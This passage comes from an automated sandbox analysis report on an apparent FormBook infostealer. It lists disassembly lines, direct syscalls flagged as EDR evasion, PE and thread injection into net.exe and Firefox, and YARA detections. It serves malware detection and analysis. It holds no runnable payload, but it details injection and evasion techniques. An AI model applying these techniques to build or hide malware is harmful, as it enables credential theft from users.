                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_0190A8E4 mov eax, dword ptr fs:[00000030h]4_2_0190A8E4
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_0187C8F9 mov eax, dword ptr fs:[00000030h]4_2_0187C8F9
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_0187C8F9 mov eax, dword ptr fs:[00000030h]4_2_0187C8F9
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018CC810 mov eax, dword ptr fs:[00000030h]4_2_018CC810
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_01862835 mov eax, dword ptr fs:[00000030h]4_2_01862835
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_01862835 mov eax, dword ptr fs:[00000030h]4_2_01862835
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_01862835 mov eax, dword ptr fs:[00000030h]4_2_01862835
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_01862835 mov ecx, dword ptr fs:[00000030h]4_2_01862835
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_01862835 mov eax, dword ptr fs:[00000030h]4_2_01862835
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_01862835 mov eax, dword ptr fs:[00000030h]4_2_01862835
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018E483A mov eax, dword ptr fs:[00000030h]4_2_018E483A
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018E483A mov eax, dword ptr fs:[00000030h]4_2_018E483A
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_0187A830 mov eax, dword ptr fs:[00000030h]4_2_0187A830
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_01852840 mov ecx, dword ptr fs:[00000030h]4_2_01852840
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_01870854 mov eax, dword ptr fs:[00000030h]4_2_01870854
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_01844859 mov eax, dword ptr fs:[00000030h]4_2_01844859
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_01844859 mov eax, dword ptr fs:[00000030h]4_2_01844859
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018D6870 mov eax, dword ptr fs:[00000030h]4_2_018D6870
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018D6870 mov eax, dword ptr fs:[00000030h]4_2_018D6870
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018CE872 mov eax, dword ptr fs:[00000030h]4_2_018CE872
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018CE872 mov eax, dword ptr fs:[00000030h]4_2_018CE872
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_01850BBE mov eax, dword ptr fs:[00000030h]4_2_01850BBE
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_01850BBE mov eax, dword ptr fs:[00000030h]4_2_01850BBE
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018F4BB0 mov eax, dword ptr fs:[00000030h]4_2_018F4BB0
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018F4BB0 mov eax, dword ptr fs:[00000030h]4_2_018F4BB0
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_01840BCD mov eax, dword ptr fs:[00000030h]4_2_01840BCD
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_01840BCD mov eax, dword ptr fs:[00000030h]4_2_01840BCD
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_01840BCD mov eax, dword ptr fs:[00000030h]4_2_01840BCD
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_01860BCB mov eax, dword ptr fs:[00000030h]4_2_01860BCB
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_01860BCB mov eax, dword ptr fs:[00000030h]4_2_01860BCB
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_01860BCB mov eax, dword ptr fs:[00000030h]4_2_01860BCB
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018EEBD0 mov eax, dword ptr fs:[00000030h]4_2_018EEBD0
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_01848BF0 mov eax, dword ptr fs:[00000030h]4_2_01848BF0
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_01848BF0 mov eax, dword ptr fs:[00000030h]4_2_01848BF0
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_01848BF0 mov eax, dword ptr fs:[00000030h]4_2_01848BF0
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_0186EBFC mov eax, dword ptr fs:[00000030h]4_2_0186EBFC
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018CCBF0 mov eax, dword ptr fs:[00000030h]4_2_018CCBF0
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_01914B00 mov eax, dword ptr fs:[00000030h]4_2_01914B00
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018BEB1D mov eax, dword ptr fs:[00000030h]4_2_018BEB1D
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018BEB1D mov eax, dword ptr fs:[00000030h]4_2_018BEB1D
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018BEB1D mov eax, dword ptr fs:[00000030h]4_2_018BEB1D
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018BEB1D mov eax, dword ptr fs:[00000030h]4_2_018BEB1D
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018BEB1D mov eax, dword ptr fs:[00000030h]4_2_018BEB1D
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018BEB1D mov eax, dword ptr fs:[00000030h]4_2_018BEB1D
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018BEB1D mov eax, dword ptr fs:[00000030h]4_2_018BEB1D
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018BEB1D mov eax, dword ptr fs:[00000030h]4_2_018BEB1D
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018BEB1D mov eax, dword ptr fs:[00000030h]4_2_018BEB1D
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_0186EB20 mov eax, dword ptr fs:[00000030h]4_2_0186EB20
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_0186EB20 mov eax, dword ptr fs:[00000030h]4_2_0186EB20
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_01908B28 mov eax, dword ptr fs:[00000030h]4_2_01908B28
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_01908B28 mov eax, dword ptr fs:[00000030h]4_2_01908B28
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018F4B4B mov eax, dword ptr fs:[00000030h]4_2_018F4B4B
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018F4B4B mov eax, dword ptr fs:[00000030h]4_2_018F4B4B
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_01912B57 mov eax, dword ptr fs:[00000030h]4_2_01912B57
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_01912B57 mov eax, dword ptr fs:[00000030h]4_2_01912B57
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_01912B57 mov eax, dword ptr fs:[00000030h]4_2_01912B57
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_01912B57 mov eax, dword ptr fs:[00000030h]4_2_01912B57
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018E8B42 mov eax, dword ptr fs:[00000030h]4_2_018E8B42
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018D6B40 mov eax, dword ptr fs:[00000030h]4_2_018D6B40
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018D6B40 mov eax, dword ptr fs:[00000030h]4_2_018D6B40
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_0190AB40 mov eax, dword ptr fs:[00000030h]4_2_0190AB40
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_01838B50 mov eax, dword ptr fs:[00000030h]4_2_01838B50
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018EEB50 mov eax, dword ptr fs:[00000030h]4_2_018EEB50
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_0183CB7E mov eax, dword ptr fs:[00000030h]4_2_0183CB7E
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_0184EA80 mov eax, dword ptr fs:[00000030h]4_2_0184EA80
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_0184EA80 mov eax, dword ptr fs:[00000030h]4_2_0184EA80
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_0184EA80 mov eax, dword ptr fs:[00000030h]4_2_0184EA80
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_0184EA80 mov eax, dword ptr fs:[00000030h]4_2_0184EA80
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_0184EA80 mov eax, dword ptr fs:[00000030h]4_2_0184EA80
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_0184EA80 mov eax, dword ptr fs:[00000030h]4_2_0184EA80
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_0184EA80 mov eax, dword ptr fs:[00000030h]4_2_0184EA80
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_0184EA80 mov eax, dword ptr fs:[00000030h]4_2_0184EA80
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_0184EA80 mov eax, dword ptr fs:[00000030h]4_2_0184EA80
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_01914A80 mov eax, dword ptr fs:[00000030h]4_2_01914A80
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_01878A90 mov edx, dword ptr fs:[00000030h]4_2_01878A90
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_01848AA0 mov eax, dword ptr fs:[00000030h]4_2_01848AA0
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_01848AA0 mov eax, dword ptr fs:[00000030h]4_2_01848AA0
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_01896AA4 mov eax, dword ptr fs:[00000030h]4_2_01896AA4
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_01896ACC mov eax, dword ptr fs:[00000030h]4_2_01896ACC
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_01896ACC mov eax, dword ptr fs:[00000030h]4_2_01896ACC
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_01896ACC mov eax, dword ptr fs:[00000030h]4_2_01896ACC
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_01840AD0 mov eax, dword ptr fs:[00000030h]4_2_01840AD0
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_01874AD0 mov eax, dword ptr fs:[00000030h]4_2_01874AD0
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_01874AD0 mov eax, dword ptr fs:[00000030h]4_2_01874AD0
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_0187AAEE mov eax, dword ptr fs:[00000030h]4_2_0187AAEE
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_0187AAEE mov eax, dword ptr fs:[00000030h]4_2_0187AAEE
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018CCA11 mov eax, dword ptr fs:[00000030h]4_2_018CCA11
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_0187CA24 mov eax, dword ptr fs:[00000030h]4_2_0187CA24
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_0186EA2E mov eax, dword ptr fs:[00000030h]4_2_0186EA2E
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_01864A35 mov eax, dword ptr fs:[00000030h]4_2_01864A35
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_01864A35 mov eax, dword ptr fs:[00000030h]4_2_01864A35
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_0187CA38 mov eax, dword ptr fs:[00000030h]4_2_0187CA38
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_01846A50 mov eax, dword ptr fs:[00000030h]4_2_01846A50
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_01846A50 mov eax, dword ptr fs:[00000030h]4_2_01846A50
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_01846A50 mov eax, dword ptr fs:[00000030h]4_2_01846A50
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_01846A50 mov eax, dword ptr fs:[00000030h]4_2_01846A50
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_01846A50 mov eax, dword ptr fs:[00000030h]4_2_01846A50
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_01846A50 mov eax, dword ptr fs:[00000030h]4_2_01846A50
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeMemory allocated: page read and write | page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Found direct / indirect Syscall (likely to bypass EDR)
                Source: C:\Program Files (x86)\QlYZARHIJVBZedAlXLnCHqizEnjMtyAONjAlnHvdzEaTEkDez\TjdgrMPwNLGImh.exeNtResumeThread: Direct from: 0x773836ACJump to behavior
                Source: C:\Program Files (x86)\QlYZARHIJVBZedAlXLnCHqizEnjMtyAONjAlnHvdzEaTEkDez\TjdgrMPwNLGImh.exeNtMapViewOfSection: Direct from: 0x77382D1CJump to behavior
                Source: C:\Program Files (x86)\QlYZARHIJVBZedAlXLnCHqizEnjMtyAONjAlnHvdzEaTEkDez\TjdgrMPwNLGImh.exeNtWriteVirtualMemory: Direct from: 0x77382E3CJump to behavior
                Source: C:\Program Files (x86)\QlYZARHIJVBZedAlXLnCHqizEnjMtyAONjAlnHvdzEaTEkDez\TjdgrMPwNLGImh.exeNtProtectVirtualMemory: Direct from: 0x77382F9CJump to behavior
                Source: C:\Program Files (x86)\QlYZARHIJVBZedAlXLnCHqizEnjMtyAONjAlnHvdzEaTEkDez\TjdgrMPwNLGImh.exeNtSetInformationThread: Direct from: 0x773763F9Jump to behavior
                Source: C:\Program Files (x86)\QlYZARHIJVBZedAlXLnCHqizEnjMtyAONjAlnHvdzEaTEkDez\TjdgrMPwNLGImh.exeNtCreateMutant: Direct from: 0x773835CCJump to behavior
                Source: C:\Program Files (x86)\QlYZARHIJVBZedAlXLnCHqizEnjMtyAONjAlnHvdzEaTEkDez\TjdgrMPwNLGImh.exeNtNotifyChangeKey: Direct from: 0x77383C2CJump to behavior
                Source: C:\Program Files (x86)\QlYZARHIJVBZedAlXLnCHqizEnjMtyAONjAlnHvdzEaTEkDez\TjdgrMPwNLGImh.exeNtSetInformationProcess: Direct from: 0x77382C5CJump to behavior
                Source: C:\Program Files (x86)\QlYZARHIJVBZedAlXLnCHqizEnjMtyAONjAlnHvdzEaTEkDez\TjdgrMPwNLGImh.exeNtCreateUserProcess: Direct from: 0x7738371CJump to behavior
                Source: C:\Program Files (x86)\QlYZARHIJVBZedAlXLnCHqizEnjMtyAONjAlnHvdzEaTEkDez\TjdgrMPwNLGImh.exeNtQueryInformationProcess: Direct from: 0x77382C26Jump to behavior
                Source: C:\Program Files (x86)\QlYZARHIJVBZedAlXLnCHqizEnjMtyAONjAlnHvdzEaTEkDez\TjdgrMPwNLGImh.exeNtResumeThread: Direct from: 0x77382FBCJump to behavior
                Source: C:\Program Files (x86)\QlYZARHIJVBZedAlXLnCHqizEnjMtyAONjAlnHvdzEaTEkDez\TjdgrMPwNLGImh.exeNtWriteVirtualMemory: Direct from: 0x7738490CJump to behavior
                Source: C:\Program Files (x86)\QlYZARHIJVBZedAlXLnCHqizEnjMtyAONjAlnHvdzEaTEkDez\TjdgrMPwNLGImh.exeNtAllocateVirtualMemory: Direct from: 0x77383C9CJump to behavior
                Source: C:\Program Files (x86)\QlYZARHIJVBZedAlXLnCHqizEnjMtyAONjAlnHvdzEaTEkDez\TjdgrMPwNLGImh.exeNtReadFile: Direct from: 0x77382ADCJump to behavior
                Source: C:\Program Files (x86)\QlYZARHIJVBZedAlXLnCHqizEnjMtyAONjAlnHvdzEaTEkDez\TjdgrMPwNLGImh.exeNtAllocateVirtualMemory: Direct from: 0x77382BFCJump to behavior
                Source: C:\Program Files (x86)\QlYZARHIJVBZedAlXLnCHqizEnjMtyAONjAlnHvdzEaTEkDez\TjdgrMPwNLGImh.exeNtDelayExecution: Direct from: 0x77382DDCJump to behavior
                Source: C:\Program Files (x86)\QlYZARHIJVBZedAlXLnCHqizEnjMtyAONjAlnHvdzEaTEkDez\TjdgrMPwNLGImh.exeNtQuerySystemInformation: Direct from: 0x77382DFCJump to behavior
                Source: C:\Program Files (x86)\QlYZARHIJVBZedAlXLnCHqizEnjMtyAONjAlnHvdzEaTEkDez\TjdgrMPwNLGImh.exeNtOpenSection: Direct from: 0x77382E0CJump to behavior
                Source: C:\Program Files (x86)\QlYZARHIJVBZedAlXLnCHqizEnjMtyAONjAlnHvdzEaTEkDez\TjdgrMPwNLGImh.exeNtQueryVolumeInformationFile: Direct from: 0x77382F2CJump to behavior
                Source: C:\Program Files (x86)\QlYZARHIJVBZedAlXLnCHqizEnjMtyAONjAlnHvdzEaTEkDez\TjdgrMPwNLGImh.exeNtQuerySystemInformation: Direct from: 0x773848CCJump to behavior
                Source: C:\Program Files (x86)\QlYZARHIJVBZedAlXLnCHqizEnjMtyAONjAlnHvdzEaTEkDez\TjdgrMPwNLGImh.exeNtReadVirtualMemory: Direct from: 0x77382E8CJump to behavior
                Source: C:\Program Files (x86)\QlYZARHIJVBZedAlXLnCHqizEnjMtyAONjAlnHvdzEaTEkDez\TjdgrMPwNLGImh.exeNtCreateKey: Direct from: 0x77382C6CJump to behavior
                Source: C:\Program Files (x86)\QlYZARHIJVBZedAlXLnCHqizEnjMtyAONjAlnHvdzEaTEkDez\TjdgrMPwNLGImh.exeNtClose: Direct from: 0x77382B6C
                Source: C:\Program Files (x86)\QlYZARHIJVBZedAlXLnCHqizEnjMtyAONjAlnHvdzEaTEkDez\TjdgrMPwNLGImh.exeNtAllocateVirtualMemory: Direct from: 0x773848ECJump to behavior
                Source: C:\Program Files (x86)\QlYZARHIJVBZedAlXLnCHqizEnjMtyAONjAlnHvdzEaTEkDez\TjdgrMPwNLGImh.exeNtQueryAttributesFile: Direct from: 0x77382E6CJump to behavior
                Source: C:\Program Files (x86)\QlYZARHIJVBZedAlXLnCHqizEnjMtyAONjAlnHvdzEaTEkDez\TjdgrMPwNLGImh.exeNtSetInformationThread: Direct from: 0x77382B4CJump to behavior
                Source: C:\Program Files (x86)\QlYZARHIJVBZedAlXLnCHqizEnjMtyAONjAlnHvdzEaTEkDez\TjdgrMPwNLGImh.exeNtQueryInformationToken: Direct from: 0x77382CACJump to behavior
                Source: C:\Program Files (x86)\QlYZARHIJVBZedAlXLnCHqizEnjMtyAONjAlnHvdzEaTEkDez\TjdgrMPwNLGImh.exeNtOpenKeyEx: Direct from: 0x77382B9CJump to behavior
                Source: C:\Program Files (x86)\QlYZARHIJVBZedAlXLnCHqizEnjMtyAONjAlnHvdzEaTEkDez\TjdgrMPwNLGImh.exeNtAllocateVirtualMemory: Direct from: 0x77382BECJump to behavior
                Source: C:\Program Files (x86)\QlYZARHIJVBZedAlXLnCHqizEnjMtyAONjAlnHvdzEaTEkDez\TjdgrMPwNLGImh.exeNtDeviceIoControlFile: Direct from: 0x77382AECJump to behavior
                Source: C:\Program Files (x86)\QlYZARHIJVBZedAlXLnCHqizEnjMtyAONjAlnHvdzEaTEkDez\TjdgrMPwNLGImh.exeNtCreateFile: Direct from: 0x77382FECJump to behavior
                Source: C:\Program Files (x86)\QlYZARHIJVBZedAlXLnCHqizEnjMtyAONjAlnHvdzEaTEkDez\TjdgrMPwNLGImh.exeNtOpenFile: Direct from: 0x77382DCCJump to behavior
                Source: C:\Program Files (x86)\QlYZARHIJVBZedAlXLnCHqizEnjMtyAONjAlnHvdzEaTEkDez\TjdgrMPwNLGImh.exeNtProtectVirtualMemory: Direct from: 0x77377B2EJump to behavior
                Injects a PE file into a foreign processes
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeMemory written: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe base: 400000 value starts with: 4D5AJump to behavior
                Maps a DLL or memory area into another process
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeSection loaded: NULL target: C:\Program Files (x86)\QlYZARHIJVBZedAlXLnCHqizEnjMtyAONjAlnHvdzEaTEkDez\TjdgrMPwNLGImh.exe protection: execute and read and writeJump to behavior
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeSection loaded: NULL target: C:\Windows\SysWOW64\net.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\net.exeSection loaded: NULL target: C:\Program Files (x86)\QlYZARHIJVBZedAlXLnCHqizEnjMtyAONjAlnHvdzEaTEkDez\TjdgrMPwNLGImh.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\net.exeSection loaded: NULL target: C:\Program Files (x86)\QlYZARHIJVBZedAlXLnCHqizEnjMtyAONjAlnHvdzEaTEkDez\TjdgrMPwNLGImh.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\net.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\net.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
                Modifies the context of a thread in another process (thread injection)
                Source: C:\Windows\SysWOW64\net.exeThread register set: target process: 5552Jump to behavior
                Queues an APC in another process (thread injection)
                Source: C:\Windows\SysWOW64\net.exeThread APC queued: target process: C:\Program Files (x86)\QlYZARHIJVBZedAlXLnCHqizEnjMtyAONjAlnHvdzEaTEkDez\TjdgrMPwNLGImh.exeJump to behavior
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeProcess created: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe "C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe"Jump to behavior
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeProcess created: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe "C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe"Jump to behavior
                Source: C:\Program Files (x86)\QlYZARHIJVBZedAlXLnCHqizEnjMtyAONjAlnHvdzEaTEkDez\TjdgrMPwNLGImh.exeProcess created: C:\Windows\SysWOW64\net.exe "C:\Windows\SysWOW64\net.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: TjdgrMPwNLGImh.exe, 0000000A.00000002.4653190817.00000000013F0000.00000002.00000001.00040000.00000000.sdmp, TjdgrMPwNLGImh.exe, 0000000A.00000000.2563900952.00000000013F0000.00000002.00000001.00040000.00000000.sdmp, TjdgrMPwNLGImh.exe, 0000000C.00000000.2714345069.0000000000E81000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: IProgram Manager
                Source: TjdgrMPwNLGImh.exe, 0000000A.00000002.4653190817.00000000013F0000.00000002.00000001.00040000.00000000.sdmp, TjdgrMPwNLGImh.exe, 0000000A.00000000.2563900952.00000000013F0000.00000002.00000001.00040000.00000000.sdmp, TjdgrMPwNLGImh.exe, 0000000C.00000000.2714345069.0000000000E81000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                Source: TjdgrMPwNLGImh.exe, 0000000A.00000002.4653190817.00000000013F0000.00000002.00000001.00040000.00000000.sdmp, TjdgrMPwNLGImh.exe, 0000000A.00000000.2563900952.00000000013F0000.00000002.00000001.00040000.00000000.sdmp, TjdgrMPwNLGImh.exe, 0000000C.00000000.2714345069.0000000000E81000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                Source: TjdgrMPwNLGImh.exe, 0000000A.00000002.4653190817.00000000013F0000.00000002.00000001.00040000.00000000.sdmp, TjdgrMPwNLGImh.exe, 0000000A.00000000.2563900952.00000000013F0000.00000002.00000001.00040000.00000000.sdmp, TjdgrMPwNLGImh.exe, 0000000C.00000000.2714345069.0000000000E81000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeQueries volume information: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Stealing of Sensitive Information

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 4.2.Gd3lOevK672JYIK.zip.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.Gd3lOevK672JYIK.zip.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000004.00000002.2639564643.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.2697225116.0000000005DB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000002.4655930930.0000000004B30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.4647930046.0000000002B70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.4653755949.0000000004880000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.2641308327.0000000003960000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
